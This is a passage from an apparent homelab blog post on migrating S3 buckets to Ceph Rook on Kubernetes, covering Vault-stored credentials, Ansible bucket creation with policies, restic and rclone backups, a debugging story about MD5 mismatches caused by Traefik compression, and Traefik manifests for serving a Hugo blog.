</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;warnings&#34;</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I&rsquo;m not pushing the <code>Endpoint</code> from the original secret, as that&rsquo;s not going to
change.</p>
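<p>A quick way to confirm that the push worked is to read the secret back from Vault,
for example:</p>
<pre tabindex="0"><code># Read the pushed credentials back from Vault, using the path from the PushSecret above
vault kv get secret/my_kubernetes_secrets/cluster/s3/users/my-user
</code></pre>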
<p>And that&rsquo;s part two done: the S3 credentials are now available to Ansible via
Vault. Now for the final part, actually creating the buckets.</p>
<p>I&rsquo;m using Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/s3_bucket_module.html">s3_bucket</a>
module to create my buckets. Compared to using Rook&rsquo;s OBC, this also allows me
to add a policy. Here is an example play:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">command_and_control_host</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Play for creating the my-bucket bucket</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/my_kubernetes_secrets/cluster/s3/users/my-user:access token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/my_kubernetes_secrets/cluster/s3/users/my-user:secret token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Create my-bucket bucket</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">amazon.aws.s3_bucket</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-bucket</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">access_key</span>: <span style="color:#e6db74">&#34;{{ s3_access }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret_key</span>: <span style="color:#e6db74">&#34;{{ s3_secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ceph</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpoint_url</span>: <span style="color:#ae81ff">https://s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">policy</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;,&#39;bucket-policies/my-bucket.json&#39;) }}&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m reading the access ID and secret key for S3 access from Vault into Ansible
variables because I&rsquo;ve got a single &ldquo;s3-buckets&rdquo; playbook, creating different
buckets with different users, so using the <code>AWS_*</code> env variables doesn&rsquo;t work.
The example will create a bucket with the credentials of the <code>my-user</code> user,
called <code>my-bucket</code> on the Ceph S3 server reachable via <code>s3.example.com</code>.
The <code>policy</code> option only accepts a JSON string, not a filename, hence the use
of the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/file_lookup.html">file lookup</a>.
A policy for a bucket with public read, like the ones I&rsquo;m using for my docs,
would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;arn:aws:s3:::my-bucket&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;*&#34;</span>
</span></span><span style="display:flex;"><span>                ]
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;arn:aws:s3:::my-bucket/*&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;*&#34;</span>
</span></span><span style="display:flex;"><span>                ]
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>So that&rsquo;s it. With three steps, I&rsquo;ve created a bucket with a policy, and all of
it is under version control. I only need to remember the following three
commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e"># Deploy the User manifest to k8s</span>
</span></span><span style="display:flex;"><span>kubectl apply -f my-user-manifest.yaml
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Deploy the PushSecret manifest to k8s</span>
</span></span><span style="display:flex;"><span>kubectl apply -f my-push-secret-manifest.yaml
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Run the Ansible playbook</span>
</span></span><span style="display:flex;"><span>ansible-playbook s3-buckets.yaml
</span></span></code></pre></div><p>Besides some filenames, they&rsquo;re going to be the same regardless of which bucket
I&rsquo;m creating. Way nicer than having to remember the <code>radosgw-admin</code>, <code>mc</code> MinIO
client, <code>vault</code> and <code>s3cmd</code> incantations I showed in the previous section.</p>
<h1 id="migrating-backup-buckets">Migrating backup buckets</h1>
<p>So let&rsquo;s get to actually migrating some buckets. The first set I worked on were
the S3 buckets for my backups. I will keep the description of the actual backup
procedure short - first, this isn&rsquo;t an article about backups, and second, mine
has so many warts that I&rsquo;m a bit embarrassed. &#x1f609;</p>
<p>My backups currently have two stages. First, I&rsquo;m using <a href="https://restic.net/">restic</a>
to back up the volumes of all of my services. There&rsquo;s one bucket per service,
and the backup runs nightly. In addition, I&rsquo;m backing up my <code>/home</code> on my desktop
and laptop. The second stage is backing up all of those buckets onto an external
HDD connected to one of my nodes, using <a href="https://rclone.org/">rclone</a>.</p>
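<p>Very roughly, and only as a sketch, the two stages look something like this
(the remote name, bucket name and paths are illustrative, not my exact setup):</p>
<pre tabindex="0"><code># Stage 1: nightly restic backup of a service volume into its own S3 bucket
restic -r s3:https://s3.example.com/srv-name backup /path/to/service-volume

# Stage 2: mirror the backup bucket onto the external HDD with rclone
rclone sync ceph-s3:srv-name /hn-data/usb-mount/buckets/srv-name
</code></pre>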
<p>The only &ldquo;special&rdquo; thing about these backup buckets is that they need access for
more than one user. There&rsquo;s the restic backup user running the per-service
backups. This user needs read and write access to every bucket. Then there&rsquo;s the
external backup user, which only needs read access to the backups.
The S3 bucket policy for those buckets looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:DeleteObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:PutObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/service-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::srv-name&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/external-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This policy is of course specific to my setup with restic and rclone. Other
S3-capable backup tools might need additional or fewer permissions on the
buckets.</p>
<p>I then just copied the buckets from the old cluster to the new cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mc cp -a --recursive old-cluster-alias/my-bucket/ new-cluster-alias/my-bucket/
</span></span></code></pre></div><p>I will show a couple of metrics on the transfer speeds and so on in the later
<a href="#metrics">Metrics section</a>.</p>
<h2 id="problems-with-mismatches-between-files-and-their-hashes">Problems with mismatches between files and their hashes</h2>
<p>During the migration of my backup buckets, I hit a pretty frustrating problem
which cost me a lot of time to analyze. During the copying of the buckets with
<code>mc</code> as well as during the initial services backup run with restic, everything
looked fine.
Then I migrated over the external disk backup, and rclone suddenly started
throwing errors like this:</p>
<pre tabindex="0"><code>&#34;Failed to sync with 4 errors: last error was: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Attempt 3/3 failed with 4 errors and: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting directories as there were IO errors&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting files as there were IO errors&#34;
&#34;ERROR : data/9e/9ea8a2f41ef73cb02ea0c4076c907210f814c26d92d22a5e59fafa1821c1f356.xabetij7.partial: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : data/51/519f791addd43bbb94b9edc9b0bf1bb7608a0736fd76b97fa126867b7aa5acc2.homotep1.partial: corrupted on transfer: md5 hash differ \&#34;0508dafb993525a6579d84cb8172c954\&#34; vs \&#34;24533a2effbf7d84b799d811f14e1dd3\&#34;&#34;
&#34;ERROR : data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93.gusidof8.partial: corrupted on transfer: md5 hash differ \&#34;647135d3de83dd64e398026c6cc8a1dd\&#34; vs \&#34;9eb1ded016386b727c35b29df58afe80\&#34;&#34;
&#34;ERROR : data/dd/dd6c50ae7e5b26aede0726128dc2d0f113dc896ffcabadd78b0e44bdd48226f8.hagoqic7.partial: corrupted on transfer: md5 hash differ \&#34;778f53d5a2987ebc060a9fce0b476613\&#34; vs \&#34;a7b482f2a64b634558587dc3f3518c39\&#34;&#34;
&#34;ERROR : Attempt 2/3 failed with 4 errors and: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting directories as there were IO errors&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting files as there were IO errors&#34;
&#34;ERROR : data/9e/9ea8a2f41ef73cb02ea0c4076c907210f814c26d92d22a5e59fafa1821c1f356.rewijes9.partial: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : data/dd/dd6c50ae7e5b26aede0726128dc2d0f113dc896ffcabadd78b0e44bdd48226f8.sixuwuf0.partial: corrupted on transfer: md5 hash differ \&#34;778f53d5a2987ebc060a9fce0b476613\&#34; vs \&#34;a7b482f2a64b634558587dc3f3518c39\&#34;&#34;
&#34;ERROR : data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93.filorut1.partial: corrupted on transfer: md5 hash differ \&#34;647135d3de83dd64e398026c6cc8a1dd\&#34; vs \&#34;9eb1ded016386b727c35b29df58afe80\&#34;&#34;
&#34;ERROR : data/51/519f791addd43bbb94b9edc9b0bf1bb7608a0736fd76b97fa126867b7aa5acc2.doyahiy9.partial: corrupted on transfer: md5 hash differ \&#34;0508dafb993525a6579d84cb8172c954\&#34; vs \&#34;24533a2effbf7d84b799d811f14e1dd3\&#34;&#34;
&#34;ERROR : Attempt 1/3 failed with 4 errors and: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting directories as there were IO errors&#34;
&#34;ERROR : Local file system at /hn-data/usb-mount/buckets/backup-mail: not deleting files as there were IO errors&#34;
&#34;ERROR : data/9e/9ea8a2f41ef73cb02ea0c4076c907210f814c26d92d22a5e59fafa1821c1f356.sosepip8.partial: corrupted on transfer: md5 hash differ \&#34;95110ecafcd3c5f37c29fa9dd8157cce\&#34; vs \&#34;fe25b63800d5d9cab3174297fc8480ce\&#34;&#34;
&#34;ERROR : data/dd/dd6c50ae7e5b26aede0726128dc2d0f113dc896ffcabadd78b0e44bdd48226f8.dalatiy1.partial: corrupted on transfer: md5 hash differ \&#34;778f53d5a2987ebc060a9fce0b476613\&#34; vs \&#34;a7b482f2a64b634558587dc3f3518c39\&#34;&#34;
&#34;ERROR : data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93.midizaw6.partial: corrupted on transfer: md5 hash differ \&#34;647135d3de83dd64e398026c6cc8a1dd\&#34; vs \&#34;9eb1ded016386b727c35b29df58afe80\&#34;&#34;
&#34;ERROR : data/51/519f791addd43bbb94b9edc9b0bf1bb7608a0736fd76b97fa126867b7aa5acc2.vonupuf0.partial: corrupted on transfer: md5 hash differ \&#34;0508dafb993525a6579d84cb8172c954\&#34; vs \&#34;24533a2effbf7d84b799d811f14e1dd3\&#34;&#34;
&#34;NOTICE: data/4a/4afea197e24fb5136beae05e5f86003cebf37e9b0d8cc020248307727c9fef93: Not decompressing &#39;Content-Encoding: gzip&#39; compressed file. Use --s3-decompress to override&#34;
</code></pre><p>The first thing to note here is that the error did not appear for every file, nor
did these errors show up for every bucket. The above example comes from a very
small 350KB bucket with 15 files total. I never saw this same error for my 50GB
<code>/home</code> backup bucket.</p>
<p>After some false starts, I was at least able to verify that the error was right:
the MD5 sum (also called &ldquo;ETag&rdquo;, e.g. in the <code>mc stat</code> output) really did not match the
file. I had no idea what was going wrong. My next test was to create a completely
new copy of one of the buckets, without running a service backup job against it,
to see whether it was restic that corrupted the bucket. But the errors showed
up immediately after syncing. I was also able to reproduce them by doing a local
<code>rclone sync new-ceph-alias:backup-mail</code> on my desktop, so it wasn&rsquo;t some weird
quirk of my backup jobs either.</p>
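<p>Just for reference, that local reproduction really was nothing more than a plain
sync of the bucket into an empty directory, along these lines (the target path is
made up):</p>
<pre tabindex="0"><code>rclone sync new-ceph-alias:backup-mail /tmp/backup-mail-check --progress
</code></pre>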
<p>For checking the checksum of a file in an S3 bucket, I used s3cmd like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd -c ~/.s3cmd-conf-file info s3://backup-mail/filename
</span></span></code></pre></div><p>The output might look like this:</p>
<pre tabindex="0"><code>s3://backup-mail/filename (object):
   File size: 2512
   Last mod:  Wed, 17 Jan 2024 22:31:15 GMT
   MIME type: application/octet-stream
   Storage:   STANDARD
   MD5 sum:   9eacc1551b0e80f38f77443aa33dc0d1
   SSE:       none
</code></pre><p>That was about the point where I got really nervous - were my backups corrupted
without me noticing? So I ran restic&rsquo;s <code>check</code> command on both the new and
the old buckets:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>restic repair index -r s3:s3.example.com/backup-mail
</span></span></code></pre></div><p>This command came back with &ldquo;no errors&rdquo; on both the old and the new buckets.</p>
<p>I also got pointed in the completely wrong direction once, because I called this
command on one of the problematic files:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rclone check --download rooks3:backup-mail/my-dir/ cephs3:backup-mail/data/dd/
</span></span><span style="display:flex;"><span>2024/01/18 22:40:53 NOTICE: S3 bucket backup-mail path my-dir: <span style="color:#ae81ff">0</span> differences found
</span></span><span style="display:flex;"><span>2024/01/18 22:40:53 NOTICE: S3 bucket backup-mail path my-dir: <span style="color:#ae81ff">1</span> matching files
</span></span></code></pre></div><p>So, the files were supposedly matching. For now, I was
convinced that the files themselves were perfectly fine, and there was just
something wrong with the MD5 sums.
After some further digging, I found out that restic uses the MinIO client lib
as their S3 backend. And I had also used MinIO&rsquo;s <code>mc</code> client to do the
bucket-to-bucket copying. So I thought: Okay, there&rsquo;s definitely a bug in
MinIO&rsquo;s client lib! Hurray, progress! I was able to confirm this by using
<code>rclone sync</code> to do the bucket-to-bucket copy, and subsequent <code>rclone sync</code> to
local did not fail. But then I got the same <code>rclone sync</code> errors again after
I had run the first restic backup against the new buckets.</p>
<p>This in turn led me to believe that there was something wrong with restic. But
I couldn&rsquo;t find anything at all on the Internet. It seemed I was the only person
seeing this error. I then updated all my restics, rclones and <code>mc</code>s to the newest
versions.</p>
<p>No dice, still the same error. That was when I started doubting the Ceph Rook
setup and questioning the entire Kubernetes migration.</p>
<p>And then, in a state of utter frustration, I ran the <code>rclone sync</code> again. This
time, I looked at the actual errors more closely, and for the first time
in this multi-day investigation really took in this line:</p>
<pre tabindex="0"><code>my-file: Not decompressing &#39;Content-Encoding: gzip&#39; compressed file. Use --s3-decompress to override
</code></pre><p>And it hit me like a brick. I&rsquo;m pretty sure I woke up my neighbors with the
facepalm I did. It was my Traefik config. I had enabled the <a href="https://doc.traefik.io/traefik/middlewares/http/compress/">Compression Middleware</a>.
And in my Ceph Rook setup, in contrast to my baremetal setup, Ceph S3 was only
reachable through my Traefik ingress.
After disabling the compression middleware, no MD5 sum problems occurred.</p>
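<p>For context: the culprit was nothing exotic, just Traefik&rsquo;s standard compress
middleware. As a Kubernetes CRD it boils down to roughly this sketch (the name and
namespace are made up, and whether it gets applied via a plain manifest like below
or via Helm values does not matter for the effect):</p>
<pre tabindex="0"><code>kubectl apply -f - &lt;&lt;&#39;EOF&#39;
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: compress
  namespace: traefik-system
spec:
  compress: {}
EOF
</code></pre>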
<p>I have to admit that at this point, the story pretty much ends. I have no complete
explanation of what might be going on here. The error message above suggests
that a compressed file reached the S3 bucket and got stored there - but that
doesn&rsquo;t really make much sense, because the compression middleware only handles
responses, it doesn&rsquo;t touch the requests, from what I see in the docs at least.</p>
<p>If anybody has a theory or even better, an actual explanation, I would very
much love to hear it, e.g. via <a href="https://social.mei-home.net/@mmeier">the Fediverse</a>.</p>
<h1 id="migrating-my-hugo-blog-and-wiki">Migrating my Hugo blog and wiki</h1>
<p>Another pair of migrations which might be interesting to some of you were my
blog and my internal docs. Both run on <a href="https://gohugo.io/">Hugo</a>. One of these
days I will actually get around to writing the obligatory &ldquo;How I&rsquo;m running this
blog&rdquo; post, but that day is not (really) today. &#x1f601;</p>
<p>In short, Hugo is a static site generator, fed with Markdown files. I generate
the files in my CI and then push them into an S3 bucket. That bucket is then
directly served via my Traefik proxy.</p>
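<p>The CI part is nothing fancy. Stripped of all the pipeline boilerplate, such a
step might look something like this (I&rsquo;m not reproducing my actual CI config here,
so the remote name and flags are just examples):</p>
<pre tabindex="0"><code># build the site into ./public
hugo --minify
# push the result into the bucket the blog is served from
rclone sync ./public cephs3:the-blogs-bucket --checksum
</code></pre>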
<p>I&rsquo;m running both the blog and the wiki via my Traefik ingress in the new k8s
setup. The IngressRoute manifest for the blog is the more interesting one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;blog.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;some-host.none-of-your-bussiness&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">dmz</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`blog.mei-home.net`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-index</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-amz-headers</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">blog</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>At the top, I&rsquo;m setting up DNS for the blog. This is only used internally. The
target is my internal fortress host, the only one reachable externally.</p>
<p>Then I specify the entry point as my DMZ entry point, the only port that the
DMZ can reach on the inside.</p>
<p>The rule itself is not too interesting, as the meat of the setup is found in
the middlewares. They look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-blogs-bucket</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">addPrefix</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prefix</span>: <span style="color:#ae81ff">/the-blogs-bucket</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">blog-index</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replacePathRegex</span>:
